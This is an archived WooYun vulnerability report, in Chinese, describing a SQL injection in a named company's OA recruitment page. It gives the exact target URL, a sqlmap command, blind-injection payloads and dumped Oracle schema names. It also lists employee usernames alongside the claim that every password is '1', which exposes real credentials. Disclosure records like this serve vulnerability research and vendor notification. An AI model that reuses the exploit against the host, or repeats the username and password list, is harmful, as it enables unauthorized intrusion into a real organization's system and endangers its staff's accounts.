乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-28: 细节已通知厂商并且等待厂商处理中 2016-02-02: 厂商已经主动忽略漏洞,细节向公众公开
rt
问题出在http://oa.avicsec.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1添加一行数据就可以了
sqlmap -u "http://oa.avicsec.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1" --dbs[01:08:13] [INFO] resuming back-end DBMS 'oracle' [01:08:13] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 7829=7829 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: id=1 AND 3066=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(117)||CHR(66)||CHR(120),5)---[01:08:13] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[01:08:13] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[01:08:13] [INFO] fetching database (schema) names[01:08:13] [INFO] fetching number of databases[01:08:13] [INFO] resumed: 20[01:08:13] [INFO] resumed: AVICPX4[01:08:13] [INFO] resumed: BAK[01:08:13] [INFO] resumed: CTXSYS[01:08:13] [INFO] resumed: DBSNMP[01:08:13] [INFO] resumed: DMSYS[01:08:13] [INFO] resumed: ECOLOGYTEST[01:08:13] [INFO] resumed: EXFSYS[01:08:13] [INFO] resumed: MDSYS[01:08:13] [INFO] resumed: OA[01:08:13] [INFO] resumed: OA0628[01:08:13] [INFO] resumed: OLAPSYS[01:08:13] [INFO] resumed: ORDSYS[01:08:13] [INFO] resumed: OUTLN[01:08:13] [INFO] resumed: SCOTT[01:08:13] [INFO] resumed: SYS[01:08:13] [INFO] resumed: SYSMAN[01:08:13] [INFO] resumed: SYSTEM[01:08:13] [INFO] resumed: TSMSYS[01:08:13] [INFO] resumed: WMSYS[01:08:13] [INFO] resumed: XDBavailable databases [20]:[*] AVICPX4[*] BAK[*] CTXSYS[*] DBSNMP[*] DMSYS[*] ECOLOGYTEST[*] EXFSYS[*] MDSYS[*] OA[*] OA0628[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
好多弱口令
liyccsunyjtanwpzhouczweijzhangleshenlnwangfsrliyuhuangslixsmoxbhanzhfangygwangytyuhbnkzhaoxxzhangwysunzqwanglinliangpfwumqguojrluojinghuangllshencyzhaokliyxychenzpnielhxuhxieyi
密码都是1
修吧
危害等级:无影响厂商忽略
忽略时间:2016-02-02 15:10
漏洞Rank:4 (WooYun评价)
2016-03-02:已修复该漏洞。